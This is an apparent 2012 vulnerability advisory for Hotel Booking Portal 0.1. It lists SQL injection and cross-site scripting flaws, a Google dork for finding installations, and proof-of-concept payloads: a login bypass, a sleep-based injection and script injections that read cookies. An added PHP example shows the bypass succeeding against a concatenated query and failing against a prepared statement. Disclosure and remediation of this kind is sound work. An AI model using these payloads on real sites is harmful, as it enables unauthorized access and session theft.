
Hotel Booking Portal 0.1 Cross Site Scripting / SQL Injection

Posted Aug 13, 2012
Authored by Yakir Wizman

Hotel Booking Portal version 0.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 6681a356490ff44dcaab0358c4e61b55

# -----------------------------------------------------------
# _____ _ _ _ _
# / ____(_) | | | | |
# | | _| |_ __ _ __| | ___| |
# | | | | __/ _` |/ _` |/ _ \ |
# | |____| | || (_| | (_| | __/ |
# \_____|_|\__\__,_|\__,_|\___|_|
#
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
# Author will not be responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to : ' or '1'='1
# password set to : ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# -----------------------------------------------------------
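
The login bypass in item II.1 depends on the submitted values becoming part of the SQL text. The PHP below is an added example, not the portal's `login.php` (its source is not shown on this page): the query shape, the table, column and function names are assumptions, and in-memory SQLite stands in for the portal's database. It runs the advisory's value through a concatenated query, which accepts it, and through a prepared statement, which rejects it.

```php
<?php
// Added illustration, NOT the portal's code. Assumed schema: users(email, password).
// In-memory SQLite stands in for the real database so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)');
// Constructed sample account. The plaintext column only keeps the comparison
// short; storing password_hash() output and checking it with password_verify()
// is a separate fix that a real login also needs.
$db->exec("INSERT INTO users VALUES ('guest@example.test', 'correct-horse')");

// Weak pattern (assumed shape of the vulnerable query): request values are
// concatenated into the statement, so quotes inside them change the WHERE clause.
function login_concat(PDO $db, string $email, string $password): bool
{
    $sql = "SELECT COUNT(*) FROM users "
         . "WHERE email = '$email' AND password = '$password'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Corrected pattern: placeholders send the values separately from the SQL
// text, so they are only ever compared as data.
function login_prepared(PDO $db, string $email, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM users WHERE email = ? AND password = ?'
    );
    $stmt->execute([$email, $password]);
    return (int) $stmt->fetchColumn() > 0;
}

// Value taken from item II.1 of the advisory, used for both fields.
$poc = "' or '1'='1";

echo 'concatenated, advisory value: ';
var_dump(login_concat($db, $poc, $poc));
echo 'prepared, advisory value:     ';
var_dump(login_prepared($db, $poc, $poc));
echo 'prepared, valid credentials:  ';
var_dump(login_prepared($db, 'guest@example.test', 'correct-horse'));
```

The same placeholder binding applies to the `country` parameter in item II.2, since a bound value cannot introduce an extra expression into the query.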
